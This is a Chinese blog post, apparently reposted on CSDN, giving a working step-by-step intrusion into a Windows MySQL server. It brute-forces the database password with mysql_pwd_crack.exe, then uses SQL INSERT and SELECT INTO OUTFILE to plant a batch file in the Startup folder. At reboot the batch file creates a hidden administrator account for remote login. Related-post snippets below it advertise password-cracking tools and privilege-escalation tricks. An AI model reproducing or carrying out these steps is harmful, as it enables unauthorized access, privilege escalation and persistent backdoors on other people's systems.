通过mysql攻击系统_攻击基于Windows平台的MySQL系统一例

最新推荐文章于 2021-02-19 02:32:16 发布
最新推荐文章于 2021-02-19 02:32:16 发布
阅读量117 收藏
点赞数
文章标签: 通过mysql攻击系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34987818/article/details/113554821
版权

mysql_pwd_crack.exe 192.168.1.14 -x 3306 -a

字典文件分别命名为:user.dic pass.dic

2.登陆对方的mysql(假设已经扫出用户名为为abc、密码为abc)

mysql -h 192.168.1.14 -u abc -p

3.创建数据库

create database aaa;4.进入数据库

use aaa;

5.在数据库aaa中创建表bbb,字段名为ccc

create table bbb(ccc text);

6.在表中插入批处理文件代码

insert into bbb values(“@echo off”);

insert into bbb values(“net user li 123456 /add”);

insert into bbb values(“net user li /active:yes”);

insert into bbb values(“net localgroup Administrators li /add”);

7.将批处理文件中的代码查询出来,并以批处理文件hacker.bat的格式保存在C:\\Documents and Settings\\Administrator\\「开始」菜单 \\程序\\启动\\目录下

SELECT * INTO OUTFILE 'C:\\Documents and Settings\\Administrator\\「开始」菜单\\程序\\启动\\hacker.bat'

FIELDS TERMINATED BY ' '

ENCLOSED BY ' '

ESCAPED BY ' '

LINES TERMINATED BY '\n'

FROM bbb;

测试结果:当对方重启计算机时,会发现他的计算机系统中会自动生成一个有管理员权限的用户li,并且用它可以远程登陆他的计算机。

分享到:

18e900b8666ce6f233d25ec02f95ee59.png

72dd548719f0ace4d5f9bca64e1d7715.png

2011-07-05 23:09

浏览 100

评论

无醛屋
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过mysql入侵win主机_通过mysql入侵NT和win2000_MySQL
weixin_33958871的博客
02-05 220
bitsCN.com许多NT和win2000机器上面装有mysql和php。而mysql默认数据库root账号为空,这就给入侵者一个途径来入侵该机器。如果修改了数据库root的账号密码,而IIS的一些其他漏洞导致源代码泄漏也可能看到数据库的账号和密码。假设我们已经拿到了数据库的密码,看看我们如何通过mysql数据库来获得该机器的一定权限。首先通常情况下,一般mysql和php配合使用,大多数NT和...
Windows系统mysql5.7.21安装详细教程
12-16
总的来说,安装MySQL 5.7.21在Windows系统下是一项相对简单的任务,只需按照向导提示一步步操作即可。但记得在安装前确保系统环境符合要求,安装过程中注意选择合适的配置选项,安装后进行必要的安全设置,如更改...
学习 用的 mysql_pwd_crack.rar
08-14
mysql_pwd_crack.rar 加上个木头字典 ,自己写也ok
linux mysql 入侵_MySql入侵测试以及防范
weixin_39725403的博客
01-19 192
在做了之前的SQL SERVER之后,便很想尝试一下MYSQL入侵测试已经防范,与大家一起分享。总的来说,我一直在用的是MYSQL,对MYSQL比较熟悉,相比较而言,感觉MYSQL更安全,这只是我自己胡乱猜想的,希望不要引起什么争论神马的。。。一本馒头引发的血案。。。正题之一物理机:Win7虚拟机:XP给予mysql远程权限:1 grant all privileges on *.* to 数据...
通过mysql入侵win主机_通过mysql入侵NT和win2000
weixin_28956181的博客
02-05 97
通过mysql入侵NT和win2000作者:网络 来源:佚名 更新时间:2008-02-08 13:09:04点击:0by coolweiscoolweis@netguard.com.cn许多nt和win2000机器上面装有mysql和php。而mysql默认数据库root账号为空,这就给入侵者一个途径来入侵该机器。如果修改了数据库root的账号密码,而iis的一些其他漏洞导致源代码泄漏也可能看到...
基于SSM+mysql图书管理系统设计与实现.docx
07-20
MySQL是一个流行的开源关系型数据库管理系统,广泛应用于Web应用程序。其特性包括: - **ACID事务支持**:确保数据的一致性和完整性。 - **高性能**:优化的查询引擎和存储引擎,如InnoDB支持行级锁定,提高并发性能...
Windows系统上使用压缩归档文件安装MySQL的步骤
09-09
Windows系统上使用压缩归档文件安装MySQL涉及到多个步骤,这些步骤包括准备文件、提取文件、配置MySQL、初始化数据库、启动MySQL服务以及进行账户安全设置。接下来详细解释这些步骤所涉及的知识点。 首先,将...
使用mysqld_multi实现单系统中配置多个MySQL服务器实例
09-10
例如,可以从MySQL的官方网站下载源码安装包,这里以5.1版本为例,通过以下命令下载: ```bash wget -c ftp://ftp.mirrorservice.org/sites/ftp.mysql.com/Downloads/MySQL-5.1.60.tar.gz ``` 接下来,解压并编译...
Windows系统MySQL数据库安装与详细配置指南
最新发布
04-07
### Windows系统MySQL数据库安装与详细配置指南 #### 一、引言 随着数据库技术的发展,MySQL因其开源、稳定及高效等特点,在众多数据库管理系统中脱颖而出,成为企业和个人开发者青睐的选择之一。对于Windows用户...
pwd_crack:ftp、ssh、mysqlwindows、cert 暴力破解
05-06
pwd_crack cert、ftp、ssh、mysqlwindows 暴力破解 cert和ftp的程序对大容量字典支持较好,其他的几个是之前写的,暂时没有修改(对大容量字典支持较差,需一次性将字典所有数据读取出来) ##cert暴力破解 ###需要安装的软件 Linux系统(建议选用ubuntu) 安装python2.7,需要额外安装的python模块:threadpool apt-get install python-setuptools easy_install threadpool 安装expect软件: apt-get install expect ###使用方法: ./cert_crack.py cert filename ##ftp暴力破解 ###需要安装的软件 Linux系统(建议选用ubuntu) 安装python2.7,需要额外安装的python模块:threadp
mysql提权_网站入侵渗透测试之各种Windows提权思路讲解(八种最新方法)
weixin_39649490的博客
12-05 323
学习技术只为更好的保障自身 公司安全,切勿违规操作,有什么不懂的技术问题可以私聊~方法一:winPEAS寻找可提权的地方仓库地址:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite也可以用lazagne来收集密码,如果找到一个RDP可连接密码,可以用以下ps1来运行执行命令$secpasswd = Co...
黑客常用的攻击平台-DOS
ruan12572的专栏
02-25 969
DOS为用户提供了一个最基本的操作环境和工作平台,DOS可以管理计算机的所有资源,实现对CPU ,存储器,I/O设备的控制以及对文字,图像和声音等信息的处理。DOS是一种单用户单任务的操作系统,其功能主要是文件管理和设备管理。DOS是层次型模块化结构的操作系统,它由Boot系统引导程序,三个核心程序以及外部命令机组成。Boot系统引导程序:在DOS每次启动时其会自动装入内存并取得控制权,由其负
mysql端口攻击_常见端口以及攻击方式
weixin_39950772的博客
02-19 722
常见端口:ftp: 默认端口:20(数据端口);21(控制端口);69(tftp小型文件传输协议)攻击方式:爆破:ftp的爆破工具有很多,这里我推荐owasp的Bruter以及msf中ftp爆破模块;nfs: 默认端口:2049攻击方式:未授权访问:未限制IP以及用户权限设置错误samba: 默认端口:137,139攻击方式:爆破:弱口令(爆破工具采用hydra)hydra -l usernam...
3306 mysql弱口令源码_MYSQL用户root密码为弱口令的攻击
weixin_39672011的博客
01-21 394
1、连接到对方MYSQL 服务器mysql -u root -h 192.168.0.1mysql.exe 这个程序在你安装了MYSQL的的BIN目录中2、让我们来看看服务器中有些什么数据库mysql>show databases;MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。3、让我们进入数据库mysql>use test...
黑客攻击系统—账号完善
零界
08-01 98
#include #include <Windows.h> using namespace std; int main(void) { char the_name; //名称 int password; //密码 cout << "请输入名称:"; cin >> the_name; cout << "请输入密码: "; cin >&g...
mysql_pwd_crack 使用说明
学习网络技术
08-02 1977
mysql密码暴力破解工具,支持远程破解。使用CLI指令。 usage : mysql_pwd_crack [ip] [options] options:         -u username  specify the username of mysql         -x port      specify the port of mysql         -p passwo
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值